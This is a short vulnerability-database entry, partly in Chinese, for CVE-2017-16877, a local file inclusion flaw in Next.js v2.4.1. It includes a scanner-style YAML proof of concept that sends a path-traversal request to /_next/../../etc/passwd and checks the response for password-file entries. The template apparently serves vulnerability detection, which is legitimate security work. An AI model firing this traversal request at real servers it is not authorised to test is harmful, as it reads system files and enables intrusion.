CVE-2017-16877: Nextjs v2.4.1 LFI

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Nextjs v2.4.1 LFI vulnerability.

PoC代码[已公开]

id: CVE-2017-16877

info:
  name: Nextjs v2.4.1 LFI
  author: Loneyer
  severity: high
  description: |-
    Nextjs v2.4.1 LFI vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-16877
  tags: cve,cve2017,nextjs,lfi
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /_next/../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()